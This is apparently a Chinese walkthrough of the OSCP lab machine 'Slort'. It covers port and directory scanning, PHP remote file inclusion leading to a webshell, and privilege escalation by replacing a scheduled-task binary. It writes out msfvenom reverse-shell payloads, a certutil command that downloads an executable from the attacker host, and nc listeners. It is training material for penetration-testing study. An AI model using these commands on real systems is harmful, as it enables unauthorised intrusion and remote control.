OSCP靶场–Slort
考点(1.php 远程文件包含 2.定时任务提权)
1.nmap扫描
┌──(root㉿kali)-[~/Desktop]
└─# nmap 192.168.178.53 -sV -sC -p- --min-rate 5000
Starting Nmap 7.92 ( https://nmap.org ) at 2024-02-24 04:37 EST
Nmap scan report for 192.168.178.53
Host is up (0.28s latency).
Not shown: 65520 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp FileZilla ftpd 0.9.41 beta
| ftp-syst:
|_ SYST: UNIX emulated by FileZilla
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3306/tcp open mysql?
| fingerprint-strings:
| DNSVersionBindReqTCP, JavaRMI, LPDString, NULL:
|_ Host '192.168.45.179' is not allowed to connect to this MariaDB server
4443/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.178.53:4443/dashboard/
5040/tcp open unknown
7680/tcp open pando-pub?
8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-open-proxy: Proxy might be redirecting requests
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.178.53:8080/dashboard/
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.92%I=7%D=2/24%Time=65D9B8F4%P=x86_64-pc-linux-gnu%r(NU
SF:LL,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45\.179'\x20is\x20not\x20al
SF:lowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(DNSVersio
SF:nBindReqTCP,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45\.179'\x20is\x20
SF:not\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(
SF:LPDString,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45\.179'\x20is\x20no
SF:t\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(Ja
SF:vaRMI,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45\.179'\x20is\x20not\x2
SF:0allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: -1s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-02-24T09:40:46
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 203.85 seconds
2.user priv
2.1 目录扫描
┌──(root㉿kali)-[~/Desktop]
└─# dirsearch --url http://192.168.178.53:8080/
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /root/.dirsearch/reports/192.168.178.53-8080/-_24-02-24_05-44-47.txt
Error Log: /root/.dirsearch/logs/errors-24-02-24_05-44-47.log
Target: http://192.168.178.53:8080/
[05:44:48] Starting:
[05:44:51] 403 - 1KB - /%C0%AE%C0%AE%C0%AF
[05:44:51] 403 - 1KB - /%3f/
[05:44:52] 403 - 1KB - /%ff
[05:44:59] 403 - 1KB - /.ht_wsr.txt
[05:44:59] 403 - 1KB - /.htaccess.bak1
[05:44:59] 403 - 1KB - /.htaccess.sample
[05:44:59] 403 - 1KB - /.htaccess.save
[05:44:59] 403 - 1KB - /.htaccess.orig
[05:44:59] 403 - 1KB - /.htaccess_extra
[05:44:59] 403 - 1KB - /.htaccess_orig
[05:44:59] 403 - 1KB - /.htaccess_sc
[05:44:59] 403 - 1KB - /.htaccessBAK
[05:44:59] 403 - 1KB - /.htaccessOLD
[05:44:59] 403 - 1KB - /.htaccessOLD2
[05:44:59] 403 - 1KB - /.htm
[05:44:59] 403 - 1KB - /.html
[05:44:59] 403 - 1KB - /.htpasswd_test
[05:44:59] 403 - 1KB - /.htpasswds
[05:44:59] 403 - 1KB - /.httr-oauth
[05:45:17] 403 - 1KB - /Trace.axd::$DATA
[05:45:19] 200 - 782B - /Webalizer/
[05:45:47] 403 - 1KB - /cgi-bin/
[05:45:47] 500 - 1KB - /cgi-bin/printenv.pl
[05:45:52] 301 - 351B - /dashboard -> http://192.168.178.53:8080/dashboard/
[05:45:52] 200 - 6KB - /dashboard/howto.html
[05:45:53] 200 - 31KB - /dashboard/faq.html
[05:45:53] 200 - 78KB - /dashboard/phpinfo.php
[05:45:59] 403 - 1KB - /error/
[05:46:01] 200 - 30KB - /favicon.ico
[05:46:02] 503 - 1KB - /examples
[05:46:02] 503 - 1KB - /examples/
[05:46:02] 503 - 1KB - /examples/servlet/SnoopServlet
[05:46:02] 503 - 1KB - /examples/jsp/%252e%252e/%252e%252e/manager/html/
[05:46:02] 503 - 1KB - /examples/jsp/snp/snoop.jsp
[05:46:02] 503 - 1KB - /examples/servlets/servlet/CookieExample
[05:46:02] 503 - 1KB - /examples/servlets/index.html
[05:46:02] 503 - 1KB - /examples/servlets/servlet/RequestHeaderExample
[05:46:06] 301 - 345B - /img -> http://192.168.178.53:8080/img/
[05:46:07] 302 - 0B - /index.php -> http://192.168.178.53:8080/dashboard/
[05:46:07] 302 - 0B - /index.pHp -> http://192.168.178.53:8080/dashboard/
[05:46:07] 302 - 0B - /index.php/login/ -> http://192.168.178.53:8080/dashboard/
[05:46:07] 302 - 0B - /index.php. -> http://192.168.178.53:8080/dashboard/
[05:46:07] 403 - 1KB - /index.php::$DATA
[05:46:21] 403 - 1KB - /phpmyadmin/ChangeLog
[05:46:21] 403 - 1KB - /phpmyadmin/doc/html/index.html
[05:46:21] 403 - 1KB - /phpmyadmin/docs/html/index.html
[05:46:21] 403 - 1KB - /phpmyadmin/README
[05:46:22] 403 - 1KB - /phpmyadmin
[05:46:24] 403 - 1KB - /phpmyadmin/
[05:46:24] 403 - 1KB - /phpmyadmin/index.php
[05:46:24] 403 - 1KB - /phpmyadmin/phpmyadmin/index.php
[05:46:24] 403 - 1KB - /phpmyadmin/scripts/setup.php
[05:46:31] 403 - 1KB - /server-status/
[05:46:31] 403 - 1KB - /server-status
[05:46:31] 403 - 1KB - /server-info
[05:46:33] 301 - 346B - /site -> http://192.168.178.53:8080/site/
[05:46:34] 301 - 27B - /site/ -> index.php?page=main.php
[05:46:46] 403 - 1KB - /web.config::$DATA
[05:46:46] 403 - 1KB - /webalizer
[05:46:49] 200 - 774B - /xampp/
Task Completed
2.2 发现php LFI漏洞:
包含phpinfo.php文件:
2.3 发现存在php RFI漏洞:
2.4 利用RFI获取webshell:
php正向webshell地址:https://github.com/WhiteWinterWolf/wwwolf-php-webshell/blob/master/webshell.php
2.5 转到交互式shell
##
┌──(root㉿kali)-[~/Desktop]
└─# msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.179 LPORT=443 -f exe -o shell443.exe
##
┌──(root㉿kali)-[~/Desktop]
└─# python -m http.server 80
## webshell上传shell443.exe
## 执行shell443.exe
##
┌──(root㉿kali)-[~/Desktop]
└─# nc -lvvp 443
## local.txt
c:\Users\rupert\Desktop>type local.txt
type local.txt
345738c06042482d447a067226c9bfa7
local.txt
3.root priv
3.1 winpeas.exe:
##
File: C:\xampp\phpMyAdmin\config.inc.php
3.2 发现定时任务:
3.3 覆盖定时任务二进制文件提权:
##
┌──(root㉿kali)-[~/Desktop]
└─# msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.179 LPORT=443 -f exe -o TFTP.EXE
##
c:\Backup>certutil -urlcache -split -f http://192.168.45.179/TFTP.EXE
##
┌──(root㉿kali)-[~/Desktop]
└─# nc -lvvp 443
4.总结
## 考点:
### 1.远程文件包含
### 2.定时任务提权